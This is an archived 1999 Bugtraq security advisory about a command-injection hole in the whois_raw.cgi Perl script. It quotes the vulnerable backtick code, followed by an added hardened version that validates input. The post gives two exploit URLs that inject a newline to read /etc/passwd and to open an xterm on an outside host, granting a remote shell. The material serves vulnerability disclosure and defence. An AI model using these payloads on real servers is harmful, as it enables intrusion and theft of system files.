[10690] in bugtraq


whois_raw.cgi problem

daemon@ATHENA.MIT.EDU (Salvatore Sanfilippo -antirez-)
Tue Jun 1 15:38:03 1999

Message-Id: <19990601003451.A2973@mclink.it>
Date: 	Tue, 1 Jun 1999 00:34:51 +0200
Reply-To: Salvatore Sanfilippo -antirez- <md5330@MCLINK.IT>
From: Salvatore Sanfilippo -antirez- <md5330@MCLINK.IT>
To: BUGTRAQ@NETSPACE.ORG

Hi,

	Sorry if this is already known.

	There is a problem in whois_raw.cgi, called from
	whois.cgi. whois_raw.cgi is part of cdomain v1.0.
	I don't know if new versions are vulnerable.

#!/usr/bin/perl
#
# whois_raw.cgi  Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
#       http://www.your-site.com/~zone/whois.html

...

require ("/usr/lib/perl5/cgi-lib.pl");

...

$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
        @result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
        @result="Dettagli non disponibili per il dominio richiesto.";
} else {
        @result=`$whois_cmd $fqdn`;
}

...


	The exploit is a banal and well-known problem:

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

bye,
antirez

--
Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez           antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai?
 se la barca te la ruba, preo.'          (M. Abruscato & O. Carmeci)
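
A hardened way to handle the `fqdn` parameter, shown as an added example that is not part of the original post or of cdomain: the name is validated against a strict host-name pattern and whois is started without a shell. The names `valid_fqdn` and `run_whois` and the whois path are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example (not cdomain code): validate 'fqdn', then run whois with no shell.
use strict;
use warnings;

# Assumption: location of the whois client (the original keeps it in $whois_cmd).
my $WHOIS = '/usr/bin/whois';

# One DNS label: letters, digits and inner hyphens, 1 to 63 characters.
# A label can never start with '-', so the value cannot be read as an option.
my $LABEL = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;

# Accept only dot-separated labels, at most 253 characters in total.
# \A and \z anchor the whole string; a '$' anchor would still accept a
# trailing newline, and the newline (%0A) is what the backticks in the
# original script hand to /bin/sh as a command separator.
sub valid_fqdn {
    my ($name) = @_;
    return 0 unless defined $name && length($name) <= 253;
    return $name =~ /\A(?:$LABEL\.)+$LABEL\z/ ? 1 : 0;
}

# The list form of open() passes its arguments directly to exec(), so no
# shell parses $name even if the validation above were ever loosened.
sub run_whois {
    my ($name) = @_;
    return ("Invalid domain name.\n") unless valid_fqdn($name);
    open(my $fh, '-|', $WHOIS, $name)
        or return ("whois lookup failed.\n");
    my @result = <$fh>;
    close $fh;
    return @result;
}

# Constructed sample inputs: a normal name, the decoded form of the first
# request quoted in the post, and a name with a trailing newline.
unless (caller) {
    my @samples = ("example.com", "\ncat /etc/passwd", "example.com\n");
    for my $name (@samples) {
        (my $shown = $name) =~ s/\n/\\n/g;   # make newlines visible in output
        printf "%-22s %s\n", "'$shown'", valid_fqdn($name) ? "accepted" : "rejected";
    }
}
```

Run directly, it only classifies the three sample values and does not contact a whois server; `run_whois` is the function a CGI handler would call in place of the backtick invocations.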
